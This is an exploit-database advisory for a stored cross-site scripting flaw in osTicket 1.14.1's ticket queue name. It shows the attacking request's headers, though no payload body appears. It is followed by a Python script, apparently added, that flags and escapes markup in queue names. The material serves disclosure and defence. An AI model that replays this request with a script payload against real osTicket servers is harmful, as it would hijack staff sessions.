osTicket 1.14.1 Ticket Queue Persistent Cross-Site Scripting Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2020-05-27 | Type: webapps | Platform: php
This exploit / vulnerability (osTicket 1.14.1 ticket queue persistent cross-site scripting) is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
# Date: 2020-05-26
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://osticket.com
# Patch Link: https://github.com/osTicket/osTicket/commit/6c724ea3fe352d10d457d334dc054ef81917fde1
# Version: osTicket 1.14.1
# Tested on: CentOS 7 (1908)
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'Ticket Queue' functionality of osTicket.
# Vulnerable Parameter : queue-name
# Exploit Details : The following request will create a ticket queue with an XSS payload as the queue name.
POST /os-ticket/scp/queues.php? HTTP/1.1
Content-Length: 4491
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://TARGET/os-ticket/scp/queues.php?
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OSTSESSID=0c1ssokv9npgmlolue4utj3l81
Connection: close
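
The stored value behind this issue is the `queue-name` form field. As an added example (not part of the original advisory and not osTicket's code), the Python below audits captured `application/x-www-form-urlencoded` bodies sent to `scp/queues.php`: it flags queue names that carry markup, including markup hidden behind nested percent-encoding, and shows the HTML-escaped form a template should emit. The sample bodies and the `other` field are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs, unquote

FIELD = "queue-name"          # vulnerable parameter named in the advisory
MARKUP = re.compile(r"[<>]")  # characters that can open or close an HTML tag
MAX_ROUNDS = 3                # bound on repeated percent-decoding

# Constructed sample bodies (not taken from the advisory); "other" is a made-up field.
SAMPLES = [
    "queue-name=Open+Tickets&other=1",
    "queue-name=%3Cb%3EOpen%3C%2Fb%3E&other=1",
    "queue-name=%253Cb%253E&other=1",
    "queue-name=R%26D+%22VIP%22&other=1",
]


def audit_body(body):
    """Return one finding per queue-name value in a urlencoded request body."""
    findings = []
    for stored in parse_qs(body, keep_blank_values=True).get(FIELD, []):
        # 'stored' is what the application receives after one round of decoding.
        probe = stored
        for _ in range(MAX_ROUNDS):  # peel nested encoding such as %253C
            peeled = unquote(probe)
            if peeled == probe:
                break
            probe = peeled
        findings.append({
            "stored": stored,
            "has_markup": bool(MARKUP.search(stored)),
            "encoded_markup": probe != stored and bool(MARKUP.search(probe)),
            # What a template should emit so the name renders as text, not HTML.
            "safe_html": html.escape(stored, quote=True),
        })
    return findings


if __name__ == "__main__":
    for body in SAMPLES:
        for f in audit_body(body):
            status = "FLAG" if f["has_markup"] or f["encoded_markup"] else "ok"
            print(f"{status:4} stored={f['stored']!r} safe_html={f['safe_html']!r}")
```

A name such as `R&D "VIP"` is not flagged but is still escaped on output, which is the point: encoding at render time protects every value, while the flag only helps triage what is already stored or logged.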